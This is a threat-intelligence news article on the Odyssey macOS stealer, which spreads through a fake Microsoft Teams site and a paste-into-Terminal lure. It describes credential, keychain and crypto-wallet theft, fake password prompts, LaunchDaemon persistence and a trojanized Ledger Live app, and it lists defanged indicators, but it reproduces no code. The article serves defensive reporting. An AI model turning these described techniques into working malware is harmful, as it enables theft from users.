Cybercriminals have escalated their attacks against macOS users by deploying a sophisticated new campaign that leverages a fraudulent Microsoft Teams download site to distribute the dangerous Odyssey stealer malware.
This development represents a significant evolution from earlier attacks that primarily targeted users through fake trading platforms.
The malicious campaign first came to light in early August 2025 when security researchers at Forcepoint documented attacks using fake TradingView sites to deliver the Odyssey stealer.
However, recent infrastructure analysis by CloudSEK’s threat intelligence platform TRIAD has revealed that the same threat actors have expanded their operations to impersonate Microsoft Teams, one of the world’s most widely used collaboration platforms.
The attackers have registered the domain teamsonsoft[.]com to host their fraudulent Microsoft Teams download page, complete with official Microsoft branding and logos to deceive unsuspecting victims.
Through advanced threat hunting techniques, researchers identified 24 unique IP addresses belonging to the same malicious infrastructure cluster, indicating the substantial scale of this operation.
The attack follows a sophisticated “clickfix” methodology that exploits user trust in legitimate software.
When victims visit the fake Microsoft Teams site and attempt to download what they believe is the official application, they are instead presented with a command to copy and paste into their Terminal application.
For macOS users, this copied command contains a base64-encoded payload that, when decoded and executed, launches a comprehensive AppleScript-based stealer.
The malware operates with surgical precision, systematically harvesting sensitive data from infected systems without requiring any software exploits—relying instead on legitimate system functions to avoid detection.
Comprehensive Data Theft Capabilities
The Odyssey stealer demonstrates alarming sophistication in its data collection capabilities. The malware targets multiple categories of sensitive information, beginning with system reconnaissance through the system_profiler utility to gather hardware and software details about the infected machine.
The stealer specifically focuses on credential theft, attempting to access Chrome keychain items and implementing a persistent authentication loop that presents fake system dialogs requesting the user’s device password.
This social engineering tactic ensures the malware obtains the elevated privileges necessary for its more invasive operations.
Perhaps most concerning is the malware’s comprehensive targeting of cryptocurrency assets.
The stealer methodically searches for and copies data from dozens of cryptocurrency wallets and browser extensions, including popular platforms like MetaMask, Electrum, Exodus, Coinomi, and hardware wallet applications such as Ledger Live and Trezor Suite.
The malware also harvests browser cookies, saved passwords, form data, and even Apple Notes databases.
Beyond data theft, the Odyssey stealer implements multiple persistence mechanisms to maintain long-term access to compromised systems.
The malware downloads additional payloads from its command-and-control server and establishes persistence through LaunchDaemons, ensuring it continues operating even after system restarts.
In a particularly devious move, the malware completely replaces legitimate Ledger Live applications with trojanized versions downloaded from the attacker’s infrastructure.
This replacement strategy allows criminals to intercept cryptocurrency transactions and potentially steal digital assets directly from users’ hardware wallets.
All stolen data is compressed into a ZIP archive stored in the system’s temporary directory before being exfiltrated to the attacker’s command-and-control server at IP address 185.93.89[.]62.
The same infrastructure hosts additional malicious payloads and even maintains a login panel for the Odyssey stealer operation.
After successful data transmission, the malware attempts to clean up evidence by removing temporary files and working directories, making forensic analysis more challenging for security researchers and incident response teams.
Implications and Recommendations
This campaign represents a concerning trend of increasingly sophisticated attacks targeting macOS users, who historically faced fewer malware threats than Windows users.
The combination of social engineering through trusted brand impersonation and advanced evasion techniques makes these attacks particularly dangerous.
Users should exercise extreme caution when downloading software, always verifying they are accessing official vendor websites and avoiding copy-paste installation commands from unfamiliar sources.
Organizations should implement comprehensive endpoint detection and response solutions capable of identifying suspicious AppleScript execution and unusual data access patterns.
The evolution from TradingView impersonation to Microsoft Teams targeting suggests these threat actors will continue adapting their tactics to exploit popular platforms and services, making ongoing vigilance essential for both individual users and enterprise security teams.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
Source link
